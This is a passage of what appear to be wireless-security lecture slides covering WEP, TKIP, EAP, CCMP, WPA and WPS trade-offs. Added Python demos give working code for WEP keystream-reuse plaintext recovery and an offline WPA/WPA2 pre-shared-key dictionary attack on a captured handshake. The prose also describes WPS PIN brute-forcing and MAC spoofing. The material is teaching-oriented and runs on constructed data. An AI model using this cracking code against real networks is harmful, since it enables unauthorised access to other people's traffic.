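        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: XOR with the keystream does both."""
    return xor_bytes(data, rc4_keystream(key, len(data)))


def keystream_cancels(key: bytes, m1: bytes, m2: bytes) -> bool:
    """Same key and no IV: c1 XOR c2 equals m1 XOR m2, so identical stretches
    of plaintext show up as zero bytes and structure leaks. True means the
    check detected keystream reuse."""
    c1, c2 = rc4_crypt(key, m1), rc4_crypt(key, m2)
    return xor_bytes(c1, c2) == xor_bytes(m1, m2)


def encrypt_with_iv(key: bytes, iv: bytes, m: bytes) -> bytes:
    """Mix a fresh IV into the key so every message gets its own keystream,
    and send the IV in clear ahead of the ciphertext so the receiver can
    rebuild it. (Plain IV||key concatenation is what WEP did and is itself a
    known weakness; it is kept here only to mirror the slides.)"""
    if len(iv) != IV_LEN:
        raise ValueError("iv must be %d bytes" % IV_LEN)
    return iv + rc4_crypt(iv + key, m)


def decrypt_with_iv(key: bytes, blob: bytes) -> bytes:
    iv, c = blob[:IV_LEN], blob[IV_LEN:]
    return rc4_crypt(iv + key, c)


if __name__ == "__main__":
    print(rc4_crypt(b"Key", b"Plaintext").hex())          # bbf316e8d940af0ad3
    print(keystream_cancels(b"Key", b"attack at dawn", b"attack at dusk"))
```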
TKIP
• TKIP is a suite of algorithms that works as a "wrapper" to WEP, which
allows users of legacy WLAN equipment to upgrade to TKIP without
replacing hardware.
• TKIP uses the original WEP programming but "wraps" additional code at
the beginning and end to encapsulate and modify it.
• Like WEP, TKIP uses the RC4 stream encryption algorithm as its basis.
• The new protocol, however, encrypts each data packet with a unique
encryption key, and the keys are much stronger than those of its
predecessor.
• To increase key strength, TKIP includes four additional algorithms:
– A cryptographic message integrity check (Michael) to protect packets
– An initialization-vector sequencing mechanism that includes hashing, as opposed
to WEP's plain text transmission (IV has sequence numbers)
– A per-packet key-mixing function to increase cryptographic strength (key mixing
with xor function)
– A re-keying mechanism to provide key generation every 10,000 packets.
EAP
• The Extensible Authentication Protocol (EAP) is a protocol for wireless
networks that expands on authentication methods used by the Point-to-
Point Protocol (PPP), a protocol often used when connecting a computer to
the Internet.
• EAP can support multiple authentication mechanisms, such as token cards,
smart cards, certificates, one-time passwords, and public key encryption
authentication.
• Here's how it works: in communications using EAP, a user requests
connection to a wireless network through an access point (a station that
transmits and receives data, sometimes known as a transceiver).
• The access point requests identification (ID) data from the user and
transmits that data to an authentication server.
• The authentication server asks the access point for proof of the validity of
the ID.
• After the access point obtains that verification from the user and sends it
back to the authentication server, the user is connected to the network as
requested.
CCMP
• Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol (CCMP) is an encryption protocol
• CCMP offers enhanced security compared with similar technologies
such as Temporal Key Integrity Protocol (TKIP).
• CCMP employs 128-bit keys and a 48-bit initialization vector that
minimizes vulnerability to replay attacks.
• The Counter Mode component provides data privacy.
• The Cipher Block Chaining Message Authentication Code
component provides data integrity and authentication.
• The enhanced privacy and security of CCMP compared with TKIP
requires additional processing power, often necessitating new or
upgraded hardware.
Advantages & Disadvantages of each method
of network security
Method Advantages Disadvantages
No security High speeds Anyone can access the
network
Use a password to access Easy to use Takes some time to enter
your device It will prevent the username and
unauthorized access. password. If it is weak,
then it is easy to crack.
Install an antivirus program Very good protection from May slow down your
on your device malicious software device
Use a software firewall It will monitor and control May slow down your
the traffic flow between device
your computer and the
network and prevent
unauthorized access to
your device
• Use a password to access the web interface used to set up your
  wireless router or access point
  – Advantages: a person who has access to the LAN and enters the
    router's IP address in a web browser still needs a password to log
    into the web-based utility page of the modem / router / access point
  – Disadvantages: takes some time to enter the user name and password;
    if the password is weak, it is easy to crack
• Turn wireless connectivity on / off
  – Advantages: complete security while it is off
  – Disadvantages: if wireless is disabled there is no wireless network
• Enable / disable SSID broadcast
  – Advantages: invisible to novice users
  – Disadvantages: experienced attackers can easily find your SSID,
    because it is still sent in the clear in probe and association
    frames whenever a client connects
• Limit access to wireless devices by MAC address
  – Advantages: extra security
  – Disadvantages: by sniffing the wireless transmissions, the allowed
    list of MAC addresses can be easily discovered and then spoofed;
    the list is difficult to manage
• WEP wireless security
  – Advantages: interoperability, since all wireless devices support
    basic WEP encryption; useful when older devices need wireless
    connectivity (works with legacy systems)
  – Disadvantages: WEP uses a single static key shared by every device
    on the network. The key itself is never transmitted, but each packet
    is encrypted with RC4 under that key plus a 24-bit initialization
    vector that is sent in the clear, so initialization vectors repeat
    after a few thousand packets and weaknesses in RC4 let a malicious
    user who gathers enough traffic recover the key. If the key needs to
    be changed, it has to be changed manually on every device connected
    to the network, which is a tedious task with many devices.
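To make the WEP weakness concrete, here is an added example that is not part of the slides: a plain RC4 implementation, WEP-style framing (clear-text 24-bit IV, RC4 keyed with IV || key, CRC-32 ICV), and the attacker's side when two frames happen to share an IV. XORing the two ciphertexts cancels the keystream and leaves the XOR of the plaintexts; since every IP frame starts with the same LLC/SNAP header and ARP frames are predictable, the attacker usually knows one of them and reads the other. The key, IV and frame contents are constructed for the demo.

```python
"""WEP keystream reuse: why a 24-bit IV sent in the clear is fatal.

Added example (not from the slides). WEP encrypts each packet with
RC4(IV || key) and transmits the IV in the clear; the key is never sent.
With only 24 bits of IV the same keystream recurs after a few thousand
packets, and two packets under the same keystream leak the XOR of their
plaintexts. Key, IV and packet contents are constructed for the demo.
"""
import math
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). XORing the keystream into data encrypts or decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                         # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                            # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: IV (clear, 3 bytes) || RC4(IV || key, payload || CRC-32 ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    icv = zlib.crc32(payload).to_bytes(4, "little")
    return iv + rc4(iv + key, payload + icv)


def wep_decrypt(key: bytes, body: bytes) -> bytes:
    """Legitimate receiver: strip the IV, decrypt, check the ICV."""
    iv, ct = body[:3], body[3:]
    pt = rc4(iv + key, ct)
    payload, icv = pt[:-4], pt[-4:]
    if zlib.crc32(payload).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return payload


def recover_with_known_plaintext(body_a: bytes, body_b: bytes, known_payload_a: bytes) -> bytes:
    """Attacker: same IV => same keystream => C_a XOR C_b = P_a XOR P_b.

    Knowing P_a (e.g. the fixed LLC/SNAP header plus a predictable ARP body)
    yields P_b for as many bytes as P_a is known. No key needed.
    """
    if body_a[:3] != body_b[:3]:
        raise ValueError("different IVs: keystreams differ, nothing cancels")
    ct_a, ct_b = body_a[3:], body_b[3:]
    n = min(len(ct_a), len(ct_b), len(known_payload_a))
    return bytes(ct_a[i] ^ ct_b[i] ^ known_payload_a[i] for i in range(n))


def expected_packets_until_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday bound for randomly chosen IVs: roughly sqrt(pi/2 * 2^bits) packets."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


def demo() -> dict:
    key = bytes.fromhex("0123456789")            # constructed 40-bit WEP key
    iv = bytes.fromhex("a1b2c3")                 # constructed IV that the sender reused
    # LLC/SNAP header (AA AA 03 00 00 00 + ethertype) is the same on every frame;
    # ARP requests are short and predictable, so frame A counts as known plaintext.
    known = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"ARP who-has 10.0.0.1"
    secret = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"POST /login pw=hunter2 ..."
    frame_a = wep_encrypt(key, iv, known)
    frame_b = wep_encrypt(key, iv, secret)
    recovered = recover_with_known_plaintext(frame_a, frame_b, known)
    return {
        "recovered": recovered,
        "matches": recovered == secret[:len(known)],
        "roundtrip": wep_decrypt(key, frame_b) == secret,
        "packets_until_iv_repeat": expected_packets_until_iv_repeat(),
    }


if __name__ == "__main__":
    print(demo())
```

The birthday estimate (about 5,000 packets before an IV repeats, if IVs were even chosen at random) is only the simplest failure; the RC4 key-scheduling weaknesses that the slide alludes to recover the key itself from a few tens of thousands of captured frames, which is why WEP should not be used at all.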
• WPA / WPA2 wireless security
  – Advantages: WPA uses much stronger encryption than its predecessor,
    WEP. WPA uses the Temporal Key Integrity Protocol (TKIP), which
    derives a fresh key for every packet sent across the network; since
    the key is constantly changing, cracking it is much harder than with
    WEP. WPA2 replaces TKIP with AES-based CCMP. If the group key needs
    to change, the access point distributes the new key to all devices
    automatically instead of it being changed manually on each one.
  – Disadvantages: incompatibility with legacy hardware and older
    operating systems; a larger performance overhead and larger data
    packets, leading to longer transmission times. TKIP itself is now
    deprecated, so WPA2 with CCMP (or WPA3) should be used wherever the
    devices support it.
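The password rows above say that a weak password is easy to crack, and that applies to WPA/WPA2 in pre-shared-key mode even though the encryption itself is strong. The following added example (not from the slides) shows why: the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), the PTK is derived from the PMK plus the two MAC addresses and two nonces that cross the air in the clear during the 4-way handshake, and message 2 of that handshake carries an HMAC-SHA1 MIC keyed with the first 16 bytes of the PTK. An attacker who sniffs one handshake can therefore test guesses offline, one PBKDF2 run per guess. The SSID, addresses, nonces, EAPOL frame and wordlist are constructed for the demo.

```python
"""Offline dictionary attack on a WPA/WPA2 pre-shared key.

Added example (not from the slides). Everything the attacker needs except
the passphrase (SSID, both MAC addresses, both nonces, the EAPOL-Key frame
and its MIC) is sniffable, so each guess costs one PBKDF2 derivation plus a
few HMACs. SSID, addresses, nonces, the EAPOL frame and the wordlist below
are constructed for the demo.
"""
import hashlib
import hmac


def wpa_pmk(ssid: str, passphrase: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    for counter in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes, nbytes: int = 48) -> bytes:
    """PTK for CCMP is 384 bits: KCK (16) || KEK (16) || TK (16). TKIP would use 64 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return wpa_prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (AES) key MIC: HMAC-SHA1 over the EAPOL frame with its MIC field zeroed, first 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Try each candidate passphrase; return (passphrase, guesses) or (None, guesses)."""
    guesses = 0
    for cand in wordlist:
        guesses += 1
        kck = wpa_ptk(wpa_pmk(ssid, cand), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return cand, guesses
    return None, guesses


def demo() -> dict:
    ssid = "HomeNet"                                   # constructed
    aa = bytes.fromhex("02aabbccdd01")                 # constructed access point address
    spa = bytes.fromhex("02aabbccdd02")                # constructed station address
    anonce = hashlib.sha256(b"anonce-demo").digest()   # constructed 32-byte nonces
    snonce = hashlib.sha256(b"snonce-demo").digest()
    real_passphrase = "sunshine1"                      # constructed weak passphrase
    # Constructed stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed.
    eapol_zeroed = b"\x02\x03\x00\x75\x02\x01\x0a" + b"\x00" * 8 + snonce + b"\x00" * 16 + b"\x00" * 24
    # What the station legitimately sends, and what the sniffer captures:
    kck = wpa_ptk(wpa_pmk(ssid, real_passphrase), aa, spa, anonce, snonce)[:16]
    captured_mic = eapol_mic(kck, eapol_zeroed)
    # Attacker side: only public values plus a wordlist.
    wordlist = ["password", "12345678", "letmein", "sunshine", "sunshine1", "Tr0ub4dor&3"]
    found, guesses = crack_psk(ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic, wordlist)
    return {"found": found, "guesses": guesses}


if __name__ == "__main__":
    print(demo())
```

The 4096-iteration PBKDF2 is the only thing slowing the attacker down, and GPU crackers run it at millions of guesses per second, so the practical defence is a long random passphrase (or 802.1X with per-user credentials, which has no shared secret to guess at all).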
• WPS (Wi-Fi Protected Setup)
  – Advantages: ease of use; no need to know the SSID or the security
    keys or passphrases
  – Disadvantages: newer technology; works only with WPS-certified
    devices; known security issues (the 8-digit PIN is checked one half
    at a time, so an attacker in range can brute-force it in roughly
    11,000 attempts, which is why PIN-based WPS should be disabled)
• Prevent physical access
  – Advantages: access is limited to the interior of the user's premises
  – Disadvantages: very expensive
• Use the router's hardware firewall
  – Advantages: prevents hackers and unauthorized persons on the Internet
    from getting access to your network
  – Disadvantages: can't stop persons in range of your Wi-Fi from
    getting onto your Wi-Fi network
• Use encryption software for sensitive information sent over the
  Internet
  – Advantages: extremely difficult for an unauthorized person to read
    your sensitive files
  – Disadvantages: this process takes some time
• userID:
• Advantages:
– Access rights to the network can be set for each
user
– User groups can be created to manage user rights
in batches
• Disadvantages:
– A userID and its password can be stolen
– Does not protect against interception of messages on
the network
• Wi-Fi Protected Access: Advantages of WPA
  – Provides much stronger wireless security than WEP
  – Adds real authentication (802.1X or a pre-shared key), per-packet
    keys and a message integrity check on top of WEP's basic encryption
  – Offers backward-compatible WEP support for devices that aren't
    upgraded
  – Integrates with RADIUS servers to allow administration, auditing and
    logging
• Disadvantages of WPA
  – Except when using the pre-shared key mode (WPA-PSK), a complicated
    setup (802.1X with a RADIUS server) is required, which is unsuitable
    for typical home users
  – Older firmware usually will not be upgraded to support it
  – Incompatible with older operating systems such as Windows 95
  – Greater performance overhead than WEP
  – Remains vulnerable to denial-of-service attacks: deauthentication and
    other management frames are unauthenticated unless 802.11w management
    frame protection is enabled
• Firewall
• Advantages
  – Relatively inexpensive or free for personal use.
  – New releases are becoming more user friendly.
  – Some firewalls, but not all, can detect viruses, worms, Trojan
    horses or data collectors.
  – A firewall blocks malicious packets before they reach a place where
    they can do harm.
• Disadvantages
  – Firewalls have to be updated continually, because attackers keep
    finding ways to circumvent them.
  – Firewalls cannot protect you from internal sabotage within a network,
    or from access that you yourself grant other users to your PC.
  – Firewalls offer weak defence against viruses.
• MAC address filtering
• Advantages
  – No cost or configuration is attached to the devices that connect to
    the network.
  – The policy is set on a router or switch, and the attached equipment
    is either permitted or it is not.
  – The person attaching the equipment has nothing to do.
• Disadvantages
  – MAC filtering is easy to spoof.
  – Because of the broadcast nature of Ethernet, and particularly of
    wireless Ethernet, an adversary can sit on the wire (or in radio
    range) and simply listen to traffic to and from permitted MAC
    addresses.
  – The adversary can then change his own MAC address to a permitted one
    and, in most cases, obtain access to the network.